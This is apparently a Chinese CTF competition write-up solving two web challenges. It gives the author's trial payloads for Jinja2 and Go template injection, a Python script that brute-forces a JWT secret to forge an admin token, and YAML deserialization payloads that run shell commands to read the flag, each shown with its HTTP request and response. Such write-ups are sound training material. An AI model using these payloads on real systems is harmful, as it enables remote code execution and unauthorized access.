2025湾区杯WP(部分)
WEB2
题目:
试错
%7B%7B7*7%7D%7D返回{{7*7}}
%7B%25%20for%20c%20in%20”.__class__.__mro__[1].__subclasses__()%20%25%7D%7B%7Bloop.index0%7D%7D:%7B%7Bc.__name__%7D%7D%3Cbr%3E%7B%25%20endfor%20%25%7D
返回
{% for c in ”.__class__.__mro__[1].__subclasses__() %}{{loop.index0}}:{{c.__name__}}
{% endfor %}
7B%7B”.__class__.__mro__[1].__subclasses__()[40](‘/bin/cat%20/flag’,%20shell=True,%20stdout=-1).communicate()[0]%7D%7D
返回
7B{”.__class__.__mro__[1].__subclasses__()[40](‘/bin/cat /flag’, shell=True, stdout=-1).communicate()[0]}}
POST /api?template=../../../../../../../../../../etc/passwd
返回../../../../../../../../../../etc/passwd
GET /api?template=%22%3E%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3Dalert%28111%29%3B%3E+ H
返回’>
dirsearch4w字典没有扫描到目录,GET /api?template=%22%3E%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3Dalert%28111%29%3B%3E+ HTTP/1.1
Host: web-5d56972681.challenge.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
X-Template: {{7*7}}
X-View-File: /flag
Referer: http://web-5d56972681.challenge./
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 08 Sep 2025 06:04:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 37
Connection: keep-alive
Server: TinyFat/0.99.75
X-Content-Type-Options: nosniff
‘>
GET /api?template=file:///flag HTTP/1.1
返回file:///flag
golang模板注入尝试%7b%7b%20%2e%45%72%72%6f%72%20%7d%7d
{{ .Error }}
{{ .Error }}
{{ .Name }}
{{ .Title }}
{{ .Content }}
{{ .Template }}
返回%7B%7B.%7D%7D
返回map[B64Decode:0x6ee380 exec:0x6ee120]
%7b%7b%20%2e%45%72%72%6f%72%20%7d%7d
POST /api?template=%7b%7b%20%63%61%6c%6c%20%28%69%6e%64%65%78%20%2e%20%22%65%78%65%63%22%29%20%22%63%61%74%20%2f%66%6c%61%67%22%20%7d%7d%0a返回{{ call (index . ‘exec’) ‘cat /flag’ }}
%7B%7Bprintf%20%22%25T%22%20%28index%20.%20%22exec%22%29%7D%7D
返回func(string) string
%7B%7B%24out%2C%20%24_err%20%3a%3d%20call%20%28index%20.%20%22exec%22%29%20%22cat%20%2Fflag%22%7D%7D%7B%7B%24out%7D%7D返回
{{$out, $_err := call (index . ‘exec’) ‘cat /flag’}}{{$out}}
%7B%7Bcall%20%28index%20.%20%22B64Decode%22%29%20%22Y2F0IC9mbGFn%22%7D%7D
返回cat /flag
{{ call (index . ‘exec’) ‘cat /flag’ }}
返回{{ call (index . ‘exec’) ‘cat /flag’ }}
确定是golang模板注入
%7B%7Bcall%20%28index%20.%20%22B64Decode%22%29%20%22Y2F0IC9mbGFn%22%7D%7D
返回cat /flag
{{ call (index . ‘exec’) ‘cat /flag’ }}
返回{{ call (index . ‘exec’) ‘cat /flag’ }}
引号被拦,换 base64 链
{{ call (index . ‘exec’) (call (index . ‘B64Decode’) ‘Y2F0IC9mbGFn’) }}
URL:
/api?template=%7B%7Bcall%20%28index%20.%20%22exec%22%29%20%28call%20%28index%20.%20%22B64Decode%22%29%20%22Y2F0IC9mbGFn%22%29%7D%7D
ez_python
http://web-64090edb27.challenge./auth
返回
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6InVzZXIifQ.karYCKLm5IhtINWMSZkSe1nYvrhyg5TgsrEm7VR1D0E
脚本爆破2位密钥(数字+字母)
import jwt, requests, string
url = ‘http://web-64090edb27.challenge./sandbox’
prefix = ‘@o70xO$0%#qR9#’
alphabet = string.ascii_letters + string.digits
payload = {‘username’: ‘guest’, ‘role’: ‘admin’}
for c1 in alphabet:
for c2 in alphabet:
key = prefix + c1 + c2
token = jwt.encode(payload, key, algorithm=’HS256′)
headers = {‘Authorization’: f’Bearer {token}’}
files = {‘codefile’: (‘x.yaml’, ‘a: 1n’), ‘mode’: (None, ‘yaml’)}
r = requests.post(url, headers=headers, files=files)
if r.status_code != 500 and ‘JWT Decode Failed’ not in r.text and r.status_code==200:
print(‘[!] Valid key found:’, key)
print(‘[!] Response:’, r.text)
exit(0)
”’
[!] Valid key found: @o70xO$0%#qR9#m0
[!] Response: {‘result’:'{‘a’: 1}’}
”’
import jwt
key = ‘@o70xO$0%#qR9#m0‘
payload = {‘username’: ‘guest’, ‘role’: ‘admin’}
token = jwt.encode(payload, key, algorithm=’HS256′)
print(token)
试错过程
ctf python 命令执行解题 getattr(__import__(‘os’), ‘x73x79x73x74x65x6d’)(‘x63x61x74x20x2fx66x6cx61x67’) 返回getattr(__import__(‘os’), ‘x73x79x73x74x65x6d’)(‘x63x61x74x20x2fx66x6cx61x67’)
__builtins__.__import__(‘os’).popen(‘cat /flag’).read()
__builtins__[‘__import__’](‘os’).popen(‘cat /flag’).read()
import importlib
os = importlib.import_module(‘os’)
os.popen(‘cat /flag’).read()
__builtins_
communicate
import
importlib
返回
{‘error’:’forbidden keyword detected’}
import
__builtins_
communicate
import
importlib
都被ban了
!!python/object/apply:subprocess.check_output
– !!python/tuple
– ‘cat’
– ‘/flag’
——WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name=’mode’
yaml
返回{‘error’:’Command ‘(‘cat’, ‘/flag’)’ returned non-zero exit status 1.’}
!!python/object/apply:os.system
– ‘cat /flag’
——WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name=’mode’
yaml
返回{‘result’:’256′}
!!python/object/apply:subprocess.check_output
– ‘ls -al’
——WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name=’mode’
yaml
返回{‘error’:'[Errno 2] No such file or directory: ‘ls -al”}
!!python/object/apply:subprocess.check_output
– !!python/tuple
– ‘ls’
– ‘-al’
返回
{‘result’:’b’total 8\ndrwxr-xr-x 1 root root 20 Aug 6 10:06 .\ndrwxr-xr-x 1 root root 32 Sep 8 08:20 ..\n-rw-r–r– 1 root root 5641 Aug 6 09:52 app.py\n”}
POST /sandbox HTTP/1.1
Host: web-64090edb27.challenge.
Content-Length: 386
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryBuu3FoilAXhPJELD
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6ImFkbWluIn0.h6QY-f521uX-fy_wmBSN2oVCGKChY9MATy75bfaZ6iU
Accept: */*
Origin: http://web-64090edb27.challenge.
Referer: http://web-64090edb27.challenge./
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
——WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name=’codefile’; filename=’1111111111111111111.txt’
Content-Type: text/plain
!!python/object/apply:subprocess.check_output
– !!python/tuple
– ‘cat’
– ‘/f1111ag’
——WebKitFormBoundaryBuu3FoilAXhPJELD
Content-Disposition: form-data; name=’mode’
yaml
——WebKitFormBoundaryBuu3FoilAXhPJELD–
返回
{‘result’:’b’flag{DpkwN8FY7C1G2GbHI1PKEmfIXvNDuxyc}\n”}